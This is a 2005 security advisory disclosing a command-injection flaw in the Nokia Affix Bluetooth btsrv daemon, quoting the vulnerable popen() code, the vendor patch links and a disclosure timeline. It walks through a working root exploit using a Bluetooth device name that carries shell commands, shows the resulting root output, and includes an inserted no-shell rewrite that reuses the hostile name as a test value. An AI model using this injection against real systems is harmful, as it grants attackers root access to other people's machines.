DMA-2005-0826a.txt
Posted Aug 28, 2005
Authored by Kevin Finisterre | Site digitalmunition.com

The Nokia Affix Bluetooth btsrv makes poor use of a popen() that in turn allows for privileged code execution as root.

tags | exploit, root, code execution
SHA-256 | cc94edfe1b5429594863603c23d573003e4beca70953ed64e8954d0aeb65b705

DMA[2005-0826a] - 'Nokia Affix Bluetooth btsrv poor use of popen()'
Author: Kevin Finisterre
Vendor: http://www-nrc.nokia.com/affix/, http://affix.sourceforge.net
Product: 'affix'
References:
http://www.digitalmunition.com/DMA[2005-0826a].txt

Description:
Affix is a Bluetooth Protocol Stack for Linux that was developed by the Nokia Research Center in
Helsinki and released under GPL. Affix supports the core Bluetooth protocols like HCI, L2CAP 1.1,
L2CAP 1.2, RFCOMM, SDP and various Bluetooth profiles. Affix consists of 'affix-kernel' which
provides kernel modules and 'affix' which provides control tools, libraries, and server daemons.

Although Nokia believes that Affix is a useful piece of software, please bear in mind that it is
not an official Nokia product, but a result of the research activity of Nokia Research Center.

The following code snippet was found in affix-3.2.0/daemon/btsrv.c:

int event_pin_code_request(struct PIN_Code_Request_Event *evt, int devnum)
{
    ...

    /* name is filled in with the remote device's advertised Bluetooth name */
    err = HCI_RemoteNameRequest(fd, &dev, name);
    if (err) {
        BTDEBUG("Name request failed: %s", hci_error(err));
    ...
    /* the unfiltered remote name is spliced into a shell command line */
    sprintf(cmdline, "/etc/affix/btsrv-gui pin \"%s\" %s", name, bda2str(&evt->bda));
    DBPRT("cmdline: [%s]", cmdline);
    /* popen() hands cmdline to /bin/sh -c, so metacharacters in name are interpreted */
    fp = popen(cmdline, "r");
    if (!fp) {
        BTERROR("popen() failed");
        goto err;
    }
    /* the helper's first whitespace-delimited token is taken as the PIN, unvalidated */
    err = fscanf(fp, "%s", pin);
    if (err == EOF) {
        BTERROR("fscanf() failed");
        pclose(fp);
        goto err;
    }

Exploitation of this bug is easier than the bluez variation of the same attack. When exploiting
bluez, previous population of the bluetooth name cache is required. On Affix however the call to
HCI_RemoteNameRequest() makes this an instant exploit regardless of the name cache.
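The root cause is that popen() routes the remote name through /bin/sh. The following is an added example, not Affix code and not the vendor's patch: it launches the helper with pipe()/fork()/execv() and a fixed argv, so the device name reaches the helper as a single argument and is never parsed by a shell, then validates what comes back before treating it as a PIN. The helper path /bin/echo, the device name and the address are stand-ins constructed for the demonstration; the numeric 1..16 digit PIN policy is an assumption of this example.

```c
/* Added example (not Affix project code). Replaces the popen() pattern in
 * btsrv with a no-shell exec: the remote name is one argv entry, so shell
 * metacharacters inside it are passed literally to the helper. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <sys/types.h>
#include <sys/wait.h>

/* Run helper with argv {helper, "pin", name, bda}, capture its stdout into
 * out (NUL-terminated, truncated to outlen-1 bytes). Returns bytes stored,
 * or -1 if the helper could not be started or exited non-zero. */
ssize_t run_pin_helper(const char *helper, const char *name, const char *bda,
                       char *out, size_t outlen)
{
    int pfd[2];
    if (outlen == 0 || pipe(pfd) == -1)
        return -1;

    pid_t pid = fork();
    if (pid == -1) {
        close(pfd[0]);
        close(pfd[1]);
        return -1;
    }
    if (pid == 0) {
        /* child: route stdout into the pipe, then exec directly (no /bin/sh) */
        dup2(pfd[1], STDOUT_FILENO);
        close(pfd[0]);
        close(pfd[1]);
        char *const argv[] = { (char *)helper, "pin", (char *)name, (char *)bda, NULL };
        execv(helper, argv);
        _exit(127); /* only reached if exec itself failed */
    }
    close(pfd[1]);

    /* parent: drain the pipe; keep reading (and discarding) once out is full
     * so a chatty child cannot block forever on write() */
    size_t total = 0;
    char scratch[256];
    for (;;) {
        int room_left = total < outlen - 1;
        char *dst = room_left ? out + total : scratch;
        size_t room = room_left ? outlen - 1 - total : sizeof scratch;
        ssize_t n = read(pfd[0], dst, room);
        if (n < 0 && errno == EINTR)
            continue;
        if (n <= 0)
            break;
        if (room_left)
            total += (size_t)n;
    }
    out[total] = '\0';
    close(pfd[0]);

    int status;
    while (waitpid(pid, &status, 0) == -1 && errno == EINTR)
        ;
    if (!WIFEXITED(status) || WEXITSTATUS(status) != 0)
        return -1;
    return (ssize_t)total;
}

/* Accept only 1..16 ASCII digits as a PIN (policy assumed for this example),
 * rather than trusting the helper's first token as btsrv's fscanf() did. */
int pin_is_valid(const char *pin)
{
    size_t len = strlen(pin);
    if (len == 0 || len > 16)
        return 0;
    for (size_t i = 0; i < len; i++)
        if (pin[i] < '0' || pin[i] > '9')
            return 0;
    return 1;
}

int main(void)
{
    /* constructed values: a hostile-looking name and a dummy address */
    const char *name = ";/usr/bin/id>/tmp/ooooo;";
    const char *bda = "00:11:22:33:44:55";
    char buf[256];

    /* /bin/echo stands in for /etc/affix/btsrv-gui: it just echoes its argv,
     * which shows the name arriving intact and uninterpreted */
    ssize_t n = run_pin_helper("/bin/echo", name, bda, buf, sizeof buf);
    printf("helper returned %zd bytes: %s", n, buf);
    printf("'1234' valid: %d, '12a4' valid: %d\n", pin_is_valid("1234"), pin_is_valid("12a4"));
    return 0;
}
```

With this structure the only way a remote name can influence the helper is as an argument value, and the value read back is checked against a fixed PIN format before use.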

The btsrv daemon should obviously be started.
root@animosity:~# btsrv
btsrv: main: btsrv started [Affix 3.2.0].
btsdpd: main: btsdpd Affix 3.2.0 started.
btsrv: start_service: Bound service Dialup Networking to port 1
btsrv: start_service: Bound service Dialup Networking Emulation to port 2
btsrv: start_service: Bound service Fax Service to port 3
btsrv: start_service: Bound service LAN Access to port 4
btsrv: start_service: Bound service OBEX File Transfer to port 5
btsrv: start_service: Bound service OBEX Object Push to port 6

As an example I will use my Ipaq 2215 to attack an Affix box. First I set the bluetooth name of
my device to ";/usr/bin/id>/tmp/ooooo;"

Next I start the attack by opening the bluetooth manager, clicking tools and going to Paired
devices. Next I click Add, search for the target host and then double tap it. When prompted for
a pin code I type in any random pin code and press enter.

After a few moments I get an "Authentication failed!" message.

On the screen where btsrv was started I see the following error which indicates an attack is
in progress.

Traceback (most recent call last):
File "/etc/affix/btsrv-gui", line 106, in ?
pin = t.go("Connection from %s [%s]" % (sys.argv[2], sys.argv[3]))
IndexError: list index out of range
sh: : command not found
btsrv: event_pin_code_request: fscanf() failed

Looking in /tmp on the target device shows successful exploitation.

root@animosity:~# ls -al /tmp/ooooo
-rw-r--r-- 1 root root 134 2005-08-26 16:47 /tmp/ooooo
root@animosity:~# cat /tmp/ooooo
uid=0(root) gid=0(root) groups=0(root)

Feel free to get creative with this... http://www.digitalmunition.com/BluezHCIDpwned.txt

Official patches for Affix can be found at http://affix.sourceforge.net
http://affix.sourceforge.net/patch_btsrv_affix_3_2_0
http://affix.sourceforge.net/patch_btsrv_affix_2_1_2

Timeline:
08/06/2005 bluez 2.19 stomps my Affix bug and reveals that *someone* borrowed bad code again!
08/18/2005 *sigh* I guess I should tell Nokia about the bug now.
08/22/2005 Carlos.Chinea from nokia responds that he will "look to it asap and fix it also asap".
08/26/2005 btsrv popen() call patch released

Outtakes:
"no, they copied from us.." - bluez
"As far as I know, we didn't borrow code...So I guess they did then" - affix

-KF

